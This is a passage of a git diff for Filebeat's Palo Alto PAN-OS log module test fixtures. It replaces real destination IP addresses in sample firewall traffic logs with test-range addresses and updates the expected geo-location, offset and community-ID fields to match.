@@ -9000,14 +8492,7 @@ "client.port": 53766, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -9033,7 +8518,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 32659, + "log.offset": 32599, "network.application": "dns", "network.bytes": 81, "network.community_id": "1:VJaNvIgkNIXRerGHtYQC0HUPZh8=", @@ -9099,14 +8584,7 @@ "client.port": 56032, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -9132,7 +8610,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 33012, + "log.offset": 32952, "network.application": "dns", "network.bytes": 81, "network.community_id": "1:fMeKYeqX7mnB812D1vOtHs7BRO4=", 
@@ -9198,14 +8676,7 @@ "client.port": 59193, "client.user.name": "crusher", "destination.address": "62.211.68.12", - "destination.as.number": 3269, - "destination.as.organization.name": "Telecom Italia", "destination.bytes": 906, - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "IT", - "destination.geo.country_name": "Italy", - "destination.geo.location.lat": 43.1479, - "destination.geo.location.lon": 12.1097, "destination.ip": "62.211.68.12", "destination.packets": 7, "destination.port": 80, @@ -9231,7 +8702,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 33365, + "log.offset": 33305, "network.application": "web-browsing", "network.bytes": 1487, "network.community_id": "1:2482BoM8NEujTrlI4lp2vfAxmus=", @@ -9296,19 +8767,15 @@ "client.packets": 1, "client.port": 59279, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -9321,7 +8788,7 @@ "event.end": "2012-04-10T04:39:48.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:48.000-02:00", "event.timezone": "-02:00", @@ -9333,10 +8800,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 33742, + "log.offset": 33682, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:FmIwID3HJ4Q0574SjlhMHApz/Hs=", + "network.community_id": "1:OUEPS1h8GK3pSmhORzo/qS63sDk=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -9368,14 +8835,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -9398,19 +8865,15 @@ "client.packets": 1, "client.port": 59278, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -9423,7 +8886,7 @@ "event.end": "2012-04-10T04:39:48.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:48.000-02:00", "event.timezone": "-02:00", @@ -9435,10 +8898,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 34106, + "log.offset": 34044, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:WiUImNtgjkeNDi1Qigg7+Y6pDAg=", + "network.community_id": "1:vkRizl1InTFzh8mosWRsH13M1kE=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -9470,14 +8933,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -9500,19 +8963,15 @@ "client.packets": 1, "client.port": 59277, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -9525,7 +8984,7 @@ "event.end": "2012-04-10T04:39:47.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:47.000-02:00", "event.timezone": "-02:00", @@ -9537,10 +8996,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 34470, + "log.offset": 34406, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:/+Opb16c1ye6uLeu1/TNC+SGnYs=", + "network.community_id": "1:fWPYdsanjAyyuvglU9X63EBU5rY=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -9572,14 +9031,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", @@ -9629,7 +9088,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 34834, + "log.offset": 34768, "network.application": "dns", "network.bytes": 166, "network.community_id": "1:h46cgrbWRw4seDnSlCbWxjLRmqs=", 
@@ -9694,19 +9153,15 @@ "client.packets": 3, "client.port": 59276, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 78, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 1, "destination.port": 80, "event.action": "flow_started", 
@@ -9719,7 +9174,7 @@ "event.end": "2012-04-10T04:39:47.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", + "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "event.outcome": "success", "event.start": "2012-04-10T04:39:47.000-02:00", "event.timezone": "-02:00", @@ -9731,10 +9186,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 35200, + "log.offset": 35134, "network.application": "web-browsing", "network.bytes": 429, - "network.community_id": "1:uslltTePy/m8Gxhk/MgPbZfk6Rg=", + "network.community_id": "1:0JDdHMQ/vA//AOa5kReESUaG4Zc=", "network.direction": "outbound", "network.packets": 4, "network.transport": "tcp", @@ -9766,14 +9221,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 78, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 1, "server.port": 80, "service.type": "panw", 
@@ -9796,19 +9251,15 @@ "client.packets": 3, "client.port": 59275, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 78, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 1, "destination.port": 80, "event.action": "flow_started", 
@@ -9821,7 +9272,7 @@ "event.end": "2012-04-10T04:39:47.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", + "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "event.outcome": "success", "event.start": "2012-04-10T04:39:47.000-02:00", "event.timezone": "-02:00", @@ -9833,10 +9284,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 35567, + "log.offset": 35499, "network.application": "web-browsing", "network.bytes": 429, - "network.community_id": "1:AVMiOufq2owuhWpcu/TfRJ38tv4=", + "network.community_id": "1:3XOAuMIA4BGVLvrD2qCIXiQJjzI=", "network.direction": "outbound", "network.packets": 4, "network.transport": "tcp", @@ -9868,14 +9319,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 78, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 1, "server.port": 80, "service.type": "panw", 
@@ -9898,19 +9349,15 @@ "client.packets": 1, "client.port": 59274, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -9923,7 +9370,7 @@ "event.end": "2012-04-10T04:39:46.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:46.000-02:00", "event.timezone": "-02:00", @@ -9935,10 +9382,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 35934, + "log.offset": 35864, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:/0xM0KlMLwieymkDApfqS3/WWiQ=", + "network.community_id": "1:85UBXOVwZbnWWb+ZE7zvB6j8D6o=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -9970,14 +9417,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log index b02eb5494bbd..293b9334c033 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log 
+++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log 
@@ -1,22 +1,22 @@ 535 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,7603,1,32801,514,57533,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:27,0,any,0,2825918,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 575 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,7835,1,37836,514,31566,514,0x500068,tcp,allow,4185,838,3347,13,2020/03/27 09:57:27,0,computer-and-internet-info,0,2825922,0x0,192.168.0.0-192.168.255.255,Germany,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,1615,1,33101,53,61714,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:42,0,any,0,2825925,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,1615,1,33101,53,61714,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:42,0,any,0,2825925,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 535 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,58717,1,38164,514,42028,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:42,0,any,0,2825926,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6949,1,59890,53,65264,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:12,0,any,0,2825916,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6776,1,34516,53,54688,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:42,0,any,0,2825923,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6949,1,59890,53,65264,53,0x400064,udp,allow,226,97,129,2,2020/03/27 
09:57:12,0,any,0,2825916,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6776,1,34516,53,54688,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:42,0,any,0,2825923,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 534 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6282,1,42905,514,23322,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:42,0,any,0,2825924,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, -527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6578,1,51150,53,47171,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:12,0,any,0,2825917,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, +527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 
09:57:41,6578,1,51150,53,47171,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:12,0,any,0,2825917,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 569 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,7223,1,49731,443,23376,443,0x4000e9,tcp,allow,104899,1939,102960,90,2020/03/27 09:57:26,1,government,0,2825919,0x0,192.168.0.0-192.168.255.255,United States,0,16,74,tcp-rst-from-client,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 522 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.2,192.168.1.2,0.0.0.0,0.0.0.0,Umbrella VA,,,dns,vsys1,Clients,Servers,ethernet1/3,ethernet1/2,Default,2020/03/27 09:57:41,58122,1,54494,53,0,0,0x0,udp,allow,78,78,0,1,2020/03/27 09:57:42,0,any,0,2825927,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,4e328bdc-1e73-4a72-a33c-88c5f4a062a3,0,0,,,,,,, 541 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:40,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:40,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:40,6477,1,49735,443,54288,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:41,0,any,0,2825915,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,, 580 <14>1 2020-03-27T09:57:40+01:00 PA-VM - - - - 1,2020/03/27 09:57:40,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:40,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet 
